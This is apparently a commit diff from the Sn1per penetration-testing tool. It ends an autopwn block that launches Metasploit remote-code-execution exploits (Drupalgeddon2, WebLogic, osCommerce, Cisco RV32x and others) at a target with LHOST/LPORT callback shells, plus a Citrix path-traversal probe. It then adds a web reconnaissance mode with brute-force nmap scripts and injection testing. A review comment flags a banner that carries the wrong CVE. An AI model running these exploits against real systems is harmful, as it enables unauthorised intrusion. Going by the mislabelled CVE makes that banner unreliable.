rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PULSE SECURE VPN ARBITRARY FILE DISCLOSURE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use gather/pulse_secure_file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CITRIX GATEWAY ARBITRARY CODE EXECUTION VULNERABILITY CVE-2019-19781 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -vk --path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You dont have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt || echo "MITIGATED: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING RAILS FILE EXPOSURE EXPLOIT CVE-2019-5418 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/gather/rails_doubletap_file_read; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CISCO RV320 AND RV325 UNAUTHENTICATED RCE EXPLOIT CVE-2019-1653 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/linux/http/cisco_rv32x_rce; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw 2> /dev/null
fi
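Review bot: the banner `RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628` carries over the CVE from the weblogic_deserialize block that ends just above it (CVE-2018-2628 is the WebLogic T3 deserialization bug, not an osCommerce identifier); drop the CVE from this banner or replace it with the correct reference for `oscommerce_installer_unauth_code_exec`. The CVE-2019-19781 check is also the only probe in this block that ignores `$PORT` and `$SSL`: it always requests `https://$TARGET/vpn/../vpns/` while writing its verdict to `cve-2019-19781-$TARGET-port$PORT.txt`, and unlike the curl calls elsewhere in this commit it has no `--connect-timeout`/`--max-time`, so an unresponsive host stalls the whole autopwn run. Finally, the `setg RHOST "$TARGET"` style inside the double-quoted `-x` string actually closes and reopens the outer quotes (the value ends up unquoted); the `\"$TARGET\"` form used in the java_rmi_server line is the one to standardise on.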

457
modes/webporthttp.sh Normal file

@@ -0,0 +1,457 @@
# WEBPORTHTTP MODE #####################################################################################################
if [[ "$MODE" = "webporthttp" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
port_http=$PORT
if [[ -z "$port_http" ]]; then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R -L --insecure http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
if [[ "$WAFWOOF" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http-port80.txt 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
echo ""
fi
if [[ "$WIG" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-http-$PORT
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http-$PORT > $LOOT_DIR/web/wig-$TARGET-http-$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-http-$PORT 2> /dev/null
fi
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u http://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http-port$PORT.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:$PORT
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
echo ""
fi
if [[ "$NMAP_SCRIPTS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u http://$TARGET:$PORT -l 3 -v n 2> /dev/null
cp -f /usr/share/blackwidow/"$TARGET"_"$PORT"/"$TARGET"_"$PORT"-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
